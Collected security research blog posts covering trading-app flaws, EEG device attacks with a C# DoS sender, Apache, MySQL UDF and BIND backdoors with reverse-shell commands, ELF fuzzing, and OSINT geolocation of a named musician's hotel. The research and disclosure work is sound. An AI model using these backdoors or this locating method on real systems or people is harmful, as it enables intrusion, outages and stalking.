Twenty of the apps (95%) do not detect rooted environments. The single app that does (look for “the moral of the story” earlier in this article) simply shows a warning message and allows the user to keep using the platform normally:

Hardcoded Secrets in Code and App Obfuscation

Six Android app installers (.apk files) were easily reverse engineered to human-readable code. The rest had medium to high levels of obfuscation, like the one shown below. The goal of obfuscation is to conceal the application’s purpose (security through obscurity) and logic in order to deter reverse engineering and make it more difficult.

 
In the non-obfuscated apps, I found secrets such as cryptographic keys and third-party service partner passwords. This could allow unauthorized access to other systems that are not under the control of the brokerage houses. For example, a Morningstar.com account (investment research) hardcoded in a Java class:

Interestingly, ten of the apps (47%) have traces (internal hostnames and IPs) of the internal development and testing environments where they were made or tested:

Other Weaknesses

The following trust issue grabbed my attention: a URL with my username (email) and first name passed as parameters was leaked to the logging console. This URL is opened to talk with, apparently, a chatbot inside the mobile app, but if you grab this URL and open it in a common web browser, the chatbot takes your identity from the supplied parameters and trusts you as a logged-in user. From there, you can ask for details about your account. As you can see, all you need to retrieve someone else’s private data is their email address and name:

 

I haven’t had enough time to fully test this feature, but so far I have been able to extract balances and personal information.

Statistics

Since a picture is worth a thousand words, consider the following graphs:

Responsible Disclosure

One of IOActive’s missions is to act responsibly when it comes to vulnerability disclosure; thus, between September 6th and 8th, we sent a detailed report to 13 of the brokerage firms whose trading apps presented some of the higher-risk vulnerabilities discussed in this article.

To date, only two brokerage firms have replied to our email.

Regulators and Rating Organizations

Digging into some US regulators’ websites,[7] [8] [9] I noticed that they are already aware of the cybersecurity threats that might negatively impact financial markets and stakeholders. Most of the published content focuses on general threats that could impact end users or institutions, such as phishing, identity theft, antivirus software, social media risks, privacy, and procedures to follow in case of cybersecurity incidents, such as data breaches or disruptive attacks.

Nevertheless, I did not find any documentation related to the security risks of electronic trading nor any recommended guidance for secure software development to educate brokers and FinTech companies on how to create quality products.

Picture taken from http://www.reuters.com/article/net-us-internet-lending/for-online-lenders-wall-street-cash-brings-growth-and-risk-idUSBRE96204I20130703
 

In addition, there are rating organizations that score online brokers on a scale of 1 to 5 stars. I glanced at two recent reports [10] [11] and didn’t find anything related to security or privacy in their reviews. Nowadays, with the frequent cyberattacks in the financial industry, I think these organizations should give accolades to, or at least mention, the security mechanisms the evaluated trading platforms implement. Security controls should equal a competitive advantage.

Conclusions and Recommendations

  • There’s still a long way to go to improve the maturity level of security in mobile trading apps.
  • Desktop and web platforms should also be tested and improved.
  • Regulators should encourage brokers to implement safeguards for a better trading environment.
  • In addition to the generic IT best practices for secure software development, regulators should develop trading-specific guidelines to be followed by the brokerage firms and FinTech companies in charge of creating trading software.
  • Brokerage firms should perform regular internal audits to continuously improve the security posture of their trading platforms.
  • Developers should analyze their apps to determine if they suffer from the vulnerabilities I have described in this post, and if so, fix them.
  • Developers should design new, more secure financial software following secure coding practices.
  • End users should enable all of the security mechanisms their apps offer.

Side Thought

Remember: the stock market is not a casino where you magically get rich overnight. If you lack an understanding of how stocks or other financial instruments work, there is a high risk of losing money quickly. You must understand the market and its purpose before investing.

With nothing left to say, I wish you happy and secure trading!

 
Thanks for reading,
Alejandro
References
[1] Ponzi scheme
[2] “Pump-and-Dumps” and Market Manipulations
[3] Practical Examples Of How Blockchains Are Used In Banking And The Financial Services Sector
[4] Personal banking apps leak info through phone
[5] (In)secure iOS Mobile Banking Apps – 2015 Edition
[6] Shoulder surfing (computer security)
[7] Financial Industry Regulatory Authority: Cybersecurity
[8] Securities Industry and Financial Markets Association: Cybersecurity
[9] U.S. Securities and Exchange Commission: Cybersecurity, the SEC and You
[10] NerdWallet: Best Online Brokers for Stock Trading 2017
[11] StockBrokers: 2017 Online Broker Rankings

RESEARCH | February 3, 2016

Brain Waves Technologies: Security in Mind? I Don’t Think So

INTRODUCTION
Just a decade ago, electroencephalography (EEG) was limited to the inner rooms of hospitals, purely for medical purposes. Nowadays, relatively cheap consumer devices capable of measuring brain wave activity are in the hands of curious kids, researchers, artists, creators, and hackers. A few of the applications of this technology include:
  • EEG-controlled Exoskeleton Hope for ALS Sufferers
  • Brain-controlled Drone
  • Translating Soldier Thoughts to Computer Commands (Military)
  • Detect Battlefield Threats via Brain Waves (Military)
  • Neurowear (Clothing)
I’ve been monitoring the news for the last year, searching for the keyword “brain waves,” and the volume of headlines is growing quickly. In other words, people out there are having fun with brain waves and are creating cool stuff using existing consumer devices and (mostly) insecure software.
 
Based on my observations using a cheap EEG device and known software, I think that many of these technologies might contain security flaws that make them vulnerable to Man-in-The-Middle (MiTM), replay, Denial-of-Service (DoS), and other attacks.

RESEARCH BACKGROUND
A few months ago, I demonstrated some of the risks associated with the acquisition, transmission, and processing of EEGs at the Bio Hacking Village at DEF CON 23 (slide deck) and at BruCON. I consider this pioneering research a wake-up call for vendors and developers. I see this technology in a similar position as industrial systems. Ten years ago, only a few people were talking about SCADA/Industrial Control System (ICS) security; today it’s a whole sub-industry. Even so, programmable logic controllers are still crashing due to basic malformed packets, and other critical ICS systems are vulnerable to replay attacks due to a lack of authentication and encryption. A similar scenario is playing out with brain wave/EEG technology.
 
It’s important to mention that some technologies such as Neuromore and NeuroElectrics’ NUBE can be used to upload your EEG activity to the cloud. I do not address this in depth, other than to note that privacy is an important concern. Is your brain activity being sent to the cloud securely? Once in the cloud, is it being stored securely? Place your bets.
In the following sections, I explain some of the security concerns I observed while playing with my own brain activity using a NeuroSky MindWave device and a variety of EEG software. Because I only present a few examples here, I encourage you to take a look at my full DEF CON slide deck for more examples.
 

I should note that real attack scenarios are a bit hard for me to achieve, since I lack specific expertise in interpreting EEG data; however, I believe I effectively demonstrate that such attacks are 100 percent feasible.

DESIGN

Through Internet research, I reviewed several technical manuals, specifications, and brochures for EEG devices and software. I searched the documents for the keywords ‘secur’, ‘crypt’, ‘auth’, and ‘passw’; 90 percent didn’t contain a single such reference. It’s pretty obvious that security has not been considered at all.

NO ENCRYPTION / NO AUTHENTICATION
The major risk associated with not using encryption or authentication is that an unauthorized person could read or impersonate someone’s brain waves through replay attacks or data tampering via MiTM attacks. The resulting level of risk depends on how the EEG data is used.

Let’s consider a MiTM attack scenario where an attacker modifies data on the fly during transmission, after data acquisition but before the brain waves reach their final destination for processing. NeuroServer is an EEG signal transceiver that uses TCP/IP and the EDF format. Although the NeuroServer technology is old and unmaintained, it is still in use (mostly for research) and is included in BrainBay, an open-source bio- and neurofeedback application.

I recorded the whole MiTM attack (full screen is recommended):


For this demonstration, I changed only an ASCII string (the patient name); however, the actual EEG data can be easily manipulated in binary format.

RESILIENCE

Resilience is the ability to withstand or recover from adversity; in this case, DoS attacks.

Brain waves are data. Data needs to be structured and parsed, and parsers have bugs. The following is a malformed EDF header I created to remotely crash NeuroServer:
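As a general illustration (not the exact header used in the original test), an EDF header is 256 bytes of fixed-width ASCII fields, and a fuzzer simply violates the width and numeric assumptions of those fields. The following sketch builds one such malformed header and sends it over TCP; the port and the raw delivery are simplifying assumptions:

```csharp
using System;
using System.Net.Sockets;
using System.Text;

// Illustrative malformed EDF header (NOT the exact proof of concept).
// An EDF header is 256 bytes of fixed-width ASCII fields; lying in the
// numeric fields is enough to trip a trusting parser.
class MalformedEdf
{
    static string Field(string value, int width) =>
        value.Length > width ? value.Substring(0, width) : value.PadRight(width);

    static void Main()
    {
        var h = new StringBuilder();
        h.Append(Field("0", 8));                 // version
        h.Append(Field("FUZZED PATIENT", 80));   // local patient ID
        h.Append(Field("FUZZED RECORDING", 80)); // local recording ID
        h.Append(Field("99.99.99", 8));          // start date (invalid)
        h.Append(Field("99.99.99", 8));          // start time (invalid)
        h.Append(Field("-1", 8));                // header byte count (a lie)
        h.Append(Field("", 44));                 // reserved
        h.Append(Field("-99999", 8));            // number of data records (a lie)
        h.Append(Field("0", 8));                 // duration of a data record
        h.Append(Field("9999", 4));              // number of signals (a lie)

        // Port 8336 is assumed to be NeuroServer's default; the raw send
        // is a simplification of the actual client/server exchange.
        using var client = new TcpClient("127.0.0.1", 8336);
        var bytes = Encoding.ASCII.GetBytes(h.ToString());
        client.GetStream().Write(bytes, 0, bytes.Length);
    }
}
```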


I recorded the execution of this remote DoS proof-of-concept code against NeuroServer:

I couldn’t believe that 1990s techniques are still killing 21st-century technology. I used an infinite loop to create as many network sockets as possible and keep them open.

The following two videos show applications crashing as a result of this old technique:

  • Neuroelectrics NIC TCP Server Remote DoS
  • OpenViBE (software for Brain-Computer Interfaces and Real-Time Neurosciences) Acquisition Server Remote DoS


THE “TOWER OF BABEL” OF EEG FILE FORMATS

From their conception, EEG vendors created their own file formats. As a result, it was very difficult to share patients’ brain waves between hospitals and physicians. Years later, in 1992, the EDF format was defined and adopted by many vendors. It’s worth mentioning that EDF and its improved version, EDF+ (2003), are now old. There are more recent file format specifications and implementations in EEG software; in other words, it’s a new playing field.

I spent some time inspecting brochures, manuals, and technical specifications in order to identify the most commonly used file formats. The following table shows that the most common formats are proprietary and EDF(+):

Physicians use client-side software to open files containing EEG data. The security problems associated with these applications are similar to those found in any software that has been developed insecurely. In the end, parsing EEG data is just like parsing any other file format, and parsing involves security risks.
 
I performed trivial file format fuzzing on some EDF samples containing brain waves in order to identify general software flaws, not only security flaws. Most applications crashed within a few seconds of receiving this malformed data, and most crashes were caused by invalid memory dereferences and other conditions that may be security bugs.
 
For instance, I was able to force an abnormal termination in Persyst Advanced Review (Insight II), commercial software that opens “virtually all commercial EEG formats,” according to its website.

In the following video, I demonstrate other bugs I found in Natus Stellate Harmonie Viewer, BrainBay, and SigViewer (which uses the BioSig open-source software library):


I think that bugs in client-side applications are less relevant here. The attack surface is reduced because this software is only used by specialized people. I don’t anticipate exploit code for EEG software in the future, but attackers often launch surprising attacks, so it should still be secured.


MISC
When brain waves are communicated over the air via Bluetooth or WiFi, what about jamming? Easy to answer.
 
What about SHODAN, the search engine for the Internet of Things? I did some searches and found a few pieces of EEG equipment accessible from the Internet. The risk here is that an attacker could perform automated password cracking to gain unauthorized access through Remote Desktop. I also noted that some equipment uses the old and unsupported Windows XP operating system. Hospitals, do you really need this equipment connected to the Internet?
STANDARDS
What about regulatory compliance? Well, some efforts have been made to treat EEG data properly. For example, the American Clinical Neurophysiology Society (ACNS) has created some guidelines.
  • (2008) Standard for Transferring Digital Neurophysiological Data Between Independent Computer Systems
  • (2006) Guideline 8: Guidelines for Recording Clinical EEG on Digital Media. Nevertheless, “magnetic storage and CD-ROMs” are mentioned here.

However, the guidelines are somewhat dated and do not consider the current technologies.
CONCLUSIONS
We need more security “in mind” for brain wave technology. Best practices, including secure design and secure programming, should be followed. I think that regulators should issue security requirements to ensure products treat brain waves in a secure manner.
 
We also need new standards and guidelines for the secure treatment of brain waves, not only from and for the healthcare industry, but for the wide range of industries where brain waves are used. To prevent an unauthorized person from reading or impersonating EEG data, vendors should implement authentication mechanisms before EEG data or streams are read or updated. Also, there must be authentication between the acquisition device, the EEG middleware, and the endpoints. Endpoints use decoded brain waves to perform tasks; possible EEG endpoints include drones, prostheses, biometric mechanisms, and more.
 
The security of this technology is not keeping pace with the risks. For now, security could be improved by implementing controls surrounding EEG technology, such as SSL tunnels to encrypt brain waves in transit. Perhaps in the future we will have layer-7 bio-signal firewalls; sounds crazy, right? But consider that ten years ago nobody imagined an ICS/SCADA firewall or Intrusion Prevention System with layer-7 Deep Packet Inspection to identify malformed packets while inspecting the network. The future is coming fast.
 
If you’re a developer, I encourage you to adopt more secure programming practices. If you’re a vendor, you should perform security testing on the medical devices and software you supply.
 
Finally, if you’re hooked on this topic and planning a trip to Spain, Alfonso Muñoz, a fellow Security Consultant at IOActive, will present “Cryptography with brainwaves for fun and… profit?” on March 3, 2016, at Rooted CON in Madrid.
 
Also, feel free to check out these explanatory articles, in which my research is mentioned:

  • The EEG Headband & Security
Happy brain waves hacking.
– Alejandro
EDITORIAL | October 16, 2015

Five Reasons Why You Should Go To BruCON

BruCON is one of the most important security conferences in Europe. It is held each October; the ‘Bru’ in ‘BruCON’ refers to Brussels, the capital of Belgium, where it all started. Nowadays, it’s held in the beautiful city of Ghent, just 55 minutes from its origin. I had the chance to attend this year, and here are the five things that, in my opinion, make it a great conference.

You can check out BruCON’s promo video here: https://www.youtube.com/watch?v=ySmCRemtMc4.
1. The conference
Great talks presented by international speakers, from deeply technical talks to threat intelligence and other high-level topics. You might run into people and friends from Vegas or other security conferences.

A circular and well-illuminated stage. You’d better not be caught taking a nap, unless you want a picture of yourself sleeping on the Internet.

(Shyama Rose talking about BASE jumping and risk)

While paid trainings take place two or three days before the conference, free workshops are available to the public during the two-day conference.

(Beau Woods (@beauwoods) giving a cool workshop named «Escalating Privileges Through Better Communication»)

While at BruCON, I presented my research on security deficiencies in electroencephalography (EEG) technologies. EEG is a non-invasive method of recording electrical brain activity (synaptic activity between neurons) taken from the scalp. EEG has increasingly been adopted across different industries, and I showed how the technology is prone to common network and application attacks. I demonstrated brain signal sniffing and data tampering through man-in-the-middle attacks, as well as denial-of-service bugs in EEG servers. Client-side applications that analyze EEG data are also prone to application flaws, and I showed how trivial fuzzing can uncover many of them. You can find the related material here: slides, demos (videos) [resource no longer available], and my live talk (video).
2. The city
The medieval architecture in Ghent will enchant you. It’s a really cool city everywhere you look, full of restaurants, cafes, and of course, pubs. Students of all ages also make this city full of vibe. You can easily spend two more days there and enjoy all Ghent has to offer.
All of this is just around the corner from the venue.
3. The b33r
I’m not a b33r connoisseur, but most of the beers I tasted while in Ghent were, according to my taste, really good. Belgium is regarded as one of the best beer countries in the world, which speaks for itself. In a nice gesture by the conference organizers, speakers were given a single bottle of a hard-to-find beer, Westvleteren 12, which has been rated as “the best beer in the world.” I have no idea how they got them, as the brewery does not produce large amounts of this beer and only sells it to a select few people.
Beer at the venue, beer between talks, and there was even a night where we mixed good beer with ice cream. It was interesting.
4. The venue
The conference is held in the heart of the city, near all the hotels, just two or three blocks from where you’re most likely to stay. The organizers thought out every single detail to help you arrive right on time at the venue.
The main hall is perfect for networking and serves b33r, coffee, and food all day, not only during specific hours.
A renowned hacker DJ dropping some bass and a pianist (a computer scientist who wrote code for Google) took turns making those moments even better.

 

It wouldn’t be a good conference without a Wall of Sheep; it was RickRolled, though ;D
(Picture taken by @sehnaoui)
The party venue, just three blocks from the stage, had a good hacker ambience and a good sound atmosphere created by two well-known DJs: @CountNinjula & @KeithMyers.

 

(Picture taken by @wimremes)
5. The old video game consoles
If you’re not interested in a talk, or simply bored, just head upstairs and travel back in time with a whole hall of old consoles. New challengers (“Here comes a new challenger”) are accepted…as long as there’s b33r or money involved.

 

 

 
Well, that’s it, another great security conference for you to consider in the future.
Finally, thanks to all this year’s organizers and volunteers. Perhaps you’ll join in next year 😉

 

(Photo taken by @SenseiZeon)
Cheers!

INSIGHTS | September 8, 2015

The Beauty of Old-school Backdoors

Nowadays, advanced voodoo rootkit techniques exist for persistence after you’ve got a shell during a pen test. Moreover, there are some bugdoors implemented on purpose by vendors, but that’s a different story. Beautiful techniques and code are available these days, but do you remember that subtle code you used to use to sneak through the door? Enjoy the nostalgia by sharing your favorite one(s) with the hashtag #oldschoolbackdoors on social networks.

 

In this post, I present five Remote Administration Tools (RATs) a.k.a. backdoors that I personally used and admired. It’s important to mention that I used these tools as part of legal pen testing projects in order to show the importance of persistence and to measure defensive effectiveness against such tools.
1. Apache mod_rootme backdoor module (2004)

“mod_rootme is a very cool module that sets up a backdoor inside of Apache where a simple GET request will allow a remote administrator the ability to grab a root shell on the system without any logging.”

 

One of the most famous tools, it only required you to execute a simple make command to compile the shared object, copy it into the modules directory, insert “LoadModule rootme2_module /usr/lib/apache2/modules/mod_rootme2.so” into httpd.conf, and restart the httpd daemon with ‘apachectl stop; apachectl start’. After that, a simple “GET root” would give you back a w00t shell.

 

2. raptor_winudf.sql – A MySQL UDF backdoor (2004–2006)

“This is a MySQL backdoor kit based on the UDFs (User Defined Functions) mechanism. Use it to spawn a reverse shell (netcat UDF on port 80/tcp) or to execute single OS commands (exec UDF).”

 

For this backdoor, you used a simple ‘# mysql -h x.x.x.x < raptor_winudf.sql’ to inject the backdoor as a user-defined function. From there, you could execute commands with ‘mysql> select exec(‘ipconfig > c:\out.txt’);’ from the MySQL shell.

 

A cool reverse-shell feature was implemented as well and could be called with ‘mysql> select netcat(‘y.y.y.y’);’ in order to send an interactive shell to port 80 on the host supplied (y.y.y.y). The screenshot below shows the variant for Linux.

Screenshot source:
http://infamoussyn.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/ (no longer active)
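Putting both UDFs together, a minimal session looks like this (a sketch; x.x.x.x is the target server, y.y.y.y your own host, and the credentials stand for any account privileged enough to create functions):

# Inject the UDF backdoor into the target MySQL server
$mysql -h x.x.x.x -u root -p < raptor_winudf.sql

# Run a single OS command through the exec() UDF
$mysql -h x.x.x.x -u root -p -e "select exec('ipconfig > c:\\out.txt');"

# Listen on 80/tcp locally, then trigger the netcat() reverse shell
$nc -l -p 80 &
$mysql -h x.x.x.x -u root -p -e "select netcat('y.y.y.y');"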
 
3. Winamp get_wbkdr.dll plugin backdoor (2006)

“wbkdr is a proof of concept Winamp backdoor that makes use of the plugin interface. It spawns cmd.exe on port 24501.”

 

This one was as easy as copying the DLL into C:\Program Files\Winamp\Plugins and playing your favorite song with Winamp in order to get a pretty cmd.exe attached to port 24501.

 

4. BIND reverse shell backdoor (2005)
This backdoor used an unpublished patch for BIND, the most widely used DNS daemon on the Internet, developed by a friend of mine from Argentina. Basically, you had to patch the source, compile, and run named (normally as root). Once it was running, sending a DNS request with ‘nslookup backdoorpassword:x.x.x.x:port target_DNS_server’ would trigger a reverse shell to the host x.x.x.x on the port given.
5. Knock-out – a port-knocking based backdoor (2006)

This is a backdoor I made using libpcap for packet sniffing (server) and libnet for packet crafting (client). I made use of the port-knocking technique to enable the backdoor, which could be a port bind or a reverse shell. The server and client use the same configuration file to determine which ports to knock and the time gap between each network packet sent. Knock-out supports TCP and UDP and still works on recent Linux boxes (tested under Ubuntu Server 14.04).
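To give an idea of how it’s driven, a hypothetical shared configuration could look like the sketch below; the field names are made up for illustration, as the real format ships with the tool:

# knock-out.conf -- illustrative sketch, shared by client and server
ports    = 7000,8000,9000   # knock sequence, in order
time_gap = 3                # seconds between each knock packet
proto    = tcp              # knock-out supports TCP and UDP
action   = reverse          # reverse shell (alternatively, a port bind)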

 

I’d say most of these backdoors still work today. You should try them out. Also, I encourage you to share the rarest backdoors you’ve ever seen, the ones you liked the most, and the peculiar ones you tried and fell in love with. Don’t forget to use the #oldschoolbackdoors hashtag ;-).

INSIGHTS | November 6, 2014

ELF Parsing Bugs by Example with Melkor Fuzzer

Too often the development community continues to blindly trust the metadata in Executable and Linking Format (ELF) files. In this paper, Alejandro Hernández walks you through the testing process for seven applications and reveals the bugs that he found. He performed the tests using Melkor, a file format fuzzer he wrote specifically for ELF files.

 

Introduction

The ELF file format, like any other file format, is an array of bits and bytes interconnected through data structures. When interpreted by an ELF parser, an ELF file makes sense, depending upon the parsing context: runtime (execution view) or static (linking view).

In 1999, ELF was chosen as the standard binary file format for *NIX systems, and now, about 15 years later, we are still in many instances blindly trusting the (meta)data within ELF files, either as executable binaries, shared libraries, or relocation objects.

However, blind trust is not necessary. Fuzzing tools are available to run proper safety checks for every single untrusted field.

To demonstrate, I tested and found bugs in seven applications using Melkor, a file format fuzzer specifically for ELF files that I developed: https://github.com/IOActive/Melkor_ELF_Fuzzer.

The following were tested:

  • HT Editor 2.1.0
  • GCC (GNU Compiler) 4.8.1
  • Snowman Decompiler v0.0.5
  • GDB (GNU Debugger) 7.8
  • IDA Pro (Demo version) 6.6.140625
  • OpenBSD 5.5 ldconfig
  • OpenBSD 5.5 Kernel

Most, if not all, of these bugs were reported to the vendors or developers.

Almost all, if not all, were only crashes (invalid memory dereferences) and I did not validate whether they’re exploitable security bugs. Therefore, please do not expect a working command execution exploit at the end of this white paper.

Melkor is an intuitive and, therefore, easy-to-use fuzzer. To get started, you simply identify:

  • The kind of metadata you want to fuzz
  • A valid ELF file to use as a template
  • The number of desired test cases you want to generate (malformed ELF files that I call ‘orcs’), as shown in my Black Hat Arsenal presentation, slides 51 and 52 [1]
  • The likelihood of each fuzzing rule as a percentage

Melkor supports several command-line options; for a quiet output, use the -q switch.

1. – Melkor Test of HT Editor 2.1.0

HT (http://hte.sourceforge.net) is my favorite ELF editor. It has parsers for all internal metadata.

Test Case Generation

To start, we’ll fuzz only the ELF header, with a 20% chance of executing each fuzzing rule, to create 1000 test cases:

$./melkor -H templates/foo -l 20 -n 1000

You will find the test cases that are generated in the orcs_foo directory along with a detailed report explaining what was fuzzed internally.

Fuzzing the Parser

You could perform manual testing by supplying each orc (test case) as a parameter to the HT Editor. However, it would take a long time to test 1000 cases by hand.

For that reason, Melkor comes with two testing scripts:

  • For Linux, test_fuzzed.sh
  • For Windows systems, win_test_fuzzed.bat

To run all the test cases automatically, enter:

$./test_fuzzed.sh orcs_foo/ "ht"

Every time HT Editor opens a valid ELF file, you must press the [F10] key to continue to the next test case.

The Bug

After 22 tries, the test case orc_0023 crashed the HT Editor:


The next step is to identify the cause of the crash by reading the detailed report generated by Melkor:


By debugging it with GDB, you can pinpoint the faulting instruction.
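A minimal session might look like the following sketch (the register values reflect the crash described below; the actual screenshots are in the white paper):

$gdb -q --args ht orcs_foo/orc_0023
(gdb) run
Program received signal SIGSEGV, Segmentation fault.
(gdb) x/i $rip        # the faulting instruction: mov (%rdi),%rax
(gdb) print $rdi      # $1 = 0, i.e., a NULL pointer dereference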

Effectively, there is a NULL pointer dereference in the instruction mov (%rdi),%rax.

2. – Melkor Test of GCC (GNU Compiler) 4.8.1

I consider GCC to be the compiler par excellence. When you type gcc foo.c -o foo, you’re performing all the phases (compilation, linking, etc.); however, if you only want to compile, the -c flag is necessary, as in gcc -c foo.c, to create the ELF relocatable object foo.o.

Normally, relocations and/or symbol tables are an important part of .o objects, and this is what we are going to fuzz.

 

Test Case Generation

Inside the templates/ folder, a foo.o file is compiled by the same Makefile that builds Melkor; it will be used as a template to create 5000 (the -n option’s default) malformed relocatable files. We instruct Melkor to fuzz the relocations within the file (-R) and the symbol tables (-s) as well:

 

$./melkor -Rs templates/foo.o

 

During the fuzzing process, you may see verbose output:

Fuzzing the Parser


 

In order to test GCC with every malformed .o object, a command like gcc -o output malformed.o must be executed. To do so automatically, the following arguments are supplied to the testing script:

 

$./test_fuzzed.sh orcs_foo.o/ "gcc -o output"

 

You can observe how mature GCC is and how it properly handles every malformed struct, field, size, etc.:


The Bug

 

Normally, in a Linux system, when a program fails due to memory corruption or an invalid memory dereference, it writes to STDERR the message: “Segmentation fault.” As a quick way to identify if we found bugs in the linker, we can simply look for that message in the output of the testing script (the script already redirected the STDERR of each test case to STDOUT).

 

$./test_fuzzed.sh orcs_foo.o/ "gcc -o output" | egrep "Testing program|Segmentation fault"


Filtering for only those that ended with a “Segmentation fault,” I saw that 197 of 5000 test cases triggered a bug.
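If you’d rather collect the offending orcs than count them by eye, a small wrapper loop does the trick (a sketch that greps for the same message the testing script looks for):

$mkdir -p crashers
$for orc in orcs_foo.o/*; do
     gcc -o output "$orc" 2>&1 | grep -q "Segmentation fault" && cp "$orc" crashers/
 done
$ls crashers/ | wc -l    # number of crashing test cases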

 

3. – Melkor Test of the Snowman Decompiler v0.0.5


Snowman (http://derevenets.com) is a great native-code-to-C/C++ decompiler for Windows. It’s free and supports PE and ELF formats for the x86 and x86-64 architectures.


Test Case Generation


As I could have mentioned in the previous example, after a period of testing I noticed that some applications properly validate all fields in the initial header and handle the errors. So, in order to fuzz more internal levels, I implemented a set of metadata dependencies in Melkor that shouldn’t be broken.


With these dependencies, it’s possible to corrupt deeper metadata without corrupting structures at higher levels. In the previous GCC example, these dependencies were transparently in place to reach the third and fourth levels of metadata: the symbol tables and relocation tables, respectively. For more about dependencies in Melkor, see the Melkor documentation on ELF metadata dependencies [2].

 

Continuing with Snowman, I created only 200 test cases with fuzzed sections in the Section Header Table (SHT), without touching the ELF header, using the default likelihood of fuzzing rules execution, which is 10%:


$./melkor -S templates/foo -n 200


Fuzzing the Parser


 

Since snowman.exe runs on Windows machines, I copied the created test cases to the Windows box where Snowman was installed and tested each case using win_test_fuzzed.bat as follows:

 

C:\Users\nitr0us\Downloads>melkor-v1.0\win_test_fuzzed.bat orcs_foo_SHT_snowman snowman-v0.0.5-win-x64\snowman.exe

 

For every instance of snowman.exe that opens without an exception, it’s necessary to close the window with the [Alt] + [F4] keyboard combination. Sorry for the inconvenience, but I kept the testing scripts as simple as possible.


The Bug


 

I was lucky on testing day. The second orc triggered an unhandled exception that made Snowman fail:


4. – Melkor Test of GDB (GNU Debugger) 7.8


GDB, the most used debugger in *NIX systems, is another great piece of code.

When you type gdb foo, the necessary ELF data structures and other metadata are parsed and prepared before the debugging process; when you actually execute the program within GDB, some additional metadata is parsed as well.

 

Test Case Generation


Most applications rely on the SHT to reach more internal metadata: the data, the code itself, etc. As you likely noticed in the previous example, and as you’ll see now with GDB, malformed SHTs might crash many applications. So, I created 2000 orcs with fuzzed SHTs:

 

$./melkor -S templates/foo -n 2000

 

To see the other examples, GDB, IDA Pro, ldconfig and OpenBSD kernel, please continue reading the white paper at http://www.ioactive.com/pdfs/IOActive_ELF_Parsing_with_Melkor.pdf

 

Conclusion


Clearly, we would be in error if we assumed that ELF files, due to the age of the format, are free from parsing mistakes; common parsing mistakes are still being found.

It would also be a mistake to assume that ELF parsers are found only in OS kernels, readelf, or objdump. Many programs support 32- and 64-bit ELF files, and antivirus engines, debuggers, OS kernels, reverse engineering tools, and even malware may contain ELF parsers.

 

I hope you have seen from these examples that fuzzing is a very helpful method for identifying functional (and security) bugs in your parsers in an automated fashion. In certain circumstances an attacker could convert a single crash into an exploitable security bug, or those small crashes could be employed as anti-reversing or anti-infection techniques.


Feel free to fuzz, crash, fix, and/or report the bugs you find to make better software.


Happy fuzzing.

 

Alejandro Hernández – @nitr0usmx

Extract from white paper at IOActive_ELF_Parsing_with_Melkor


Acknowledgments

IOActive, Inc.

 

References

[1] Alejandro Hernández. “In the lands of corrupted elves: Breaking ELF software with Melkor fuzzer.” </wp-content/uploads/2014/11/us-14-Hernandez-Melkor-Slides.pdf>
[2] Melkor Documentation: ELF Metadata Dependencies and Fuzzing Rules. <https://github.com/IOActive/Melkor_ELF_Fuzzer/tree/master/docs>
[3] IOActive Security Advisory: OpenBSD 5.5 Local Kernel Panic. <http://www.ioactive.com/pdfs/IOActive_Advisory_OpenBSD_5_5_Local_Kernel_Panic.pdf>

INSIGHTS | May 7, 2014

Glass Reflections in Pictures + OSINT = More Accurate Location

By Alejandro Hernández – @nitr0usmx

Disclaimer: The aim of this article is to help people be more careful when taking pictures through windows, because they might reveal their location inadvertently. The technique presented here could be used for many different purposes, such as tracking down the location of the bad guys, simply finding out in which hotel that nice room is, or, for some people, following the tracks of their favorite artist.
All of the pictures presented here were posted by their owners on Twitter. The tools and information used to determine the locations where the pictures were taken are all publicly available on the Internet. No illegal actions were performed in the work presented here.

 
 
Introduction
Travelling can be enriching and inspiring, especially if you’re somewhere you haven’t been before. Whether on vacation or travelling for business, one of the first things people usually do, myself included, after arriving in their hotel room is turn on the lights (even if daylight is still coming through the windows), jump on the bed to feel how comfortable it is, walk to the window, and admire the view. If you like what you see, sometimes you grab your camera and take a picture, regardless of reflections in the window.
Without considering geolocation metadata [1] (if enabled), reflections could be a way to get more accurate information about where a picture was taken. How could reflection, one of glass’s optical properties [2], disclose your location? Continue reading.
Of course, pictures taken from windows disclose location information such as the city and/or streets; however, people don’t always disclose the specific name of the place where they’re standing. This is where reflections could be useful.
Sometimes, not all of the time, but sometimes, reflections contain recognizable elements that, with a little extra help from OSINT (Open Source Intelligence) [3], could reveal a more accurate location. The OSINT elements that I used include:
  • Google Earth 3D Buildings (http://www.google.com/earth/)
  • Google Maps (and Street View) (http://maps.google.com)
  • Emporis (buildings information) (http://www.emporis.com)
  • SkyscraperPage (buildings information) (http://skyscraperpage.com)
  • Foursquare (pictures uploaded by people) (http://foursquare.com)
  • TripAdvisor (pictures uploaded by people) (http://www.tripadvisor.com)
  • Hotels’ websites
  • Google.com
In the following case studies, I’ll present step-by-step instructions for how to get more accurate information about where a picture was taken using reflections.
CASE #1 – Miami, FL
Searching for “hotel view” pictures on Twitter, I found this one from Scott Hoying (a member of Pentatonix, an a cappella group of five vocalists):
 
Looking at his previous tweet:
 
 We know he was in Miami, but, where exactly? Whether or not you’ve been to Miami, it’s difficult to recognize the buildings outside the window:
 
 So, I went to Wikipedia to get the name of every member of the band:
I looked for them on Twitter and Instagram. Only one other member had published a picture from what appeared to be the same hotel:
It was relatively easy to find that view with Google Earth:
However, from that perspective, there are three hotels:
So, it’s time to focus on the reflection elements present in the picture (the same element reflected at different angles, plus the portraits) as well as the pattern on the bed cover:
Two great resources for reference pictures, in addition to hotels’ websites, are Foursquare and TripAdvisor (some people like to show where they’re staying). So, after a couple of minutes analyzing pictures of the three possible hotels, I finally found our reflected elements in pictures uploaded by people and on the hotel’s website itself:
After some minutes, we can conclude that the band stayed at the Epic Hotel and, perhaps, in a Water View suite:
 
 
CASE #2 – Vancouver, Canada
The following picture was posted by a friend of mine with the comment that she was ready for her talk at #XXXX2014 conference in #Vancouver. The easiest way to get her location would have been to look for the list of partnering hotels for speakers at XXXX2014 conference, but what if the name of the conference hadn’t been available?
Let’s take the longer but more interesting path, starting with only the knowledge that this picture was taken in Vancouver:
The square lamp reflected is pretty clear, isn’t it? ;-). First, let’s find that building in front. For that, you could go straight to Google Earth with the 3D buildings layout enabled, but I preferred to dive into Vancouver’s pictures in Emporis:
We’ve found it’s the Convention Centre (and its exact location evidently). Now, it’s easy to match the perspective from which the picture was taken using Google Earth’s 3D buildings layout:
We see it, but, where are we standing? Another useful OSINT resource I used was the SkyscraperPage of Vancouver, which shows us two options:
 
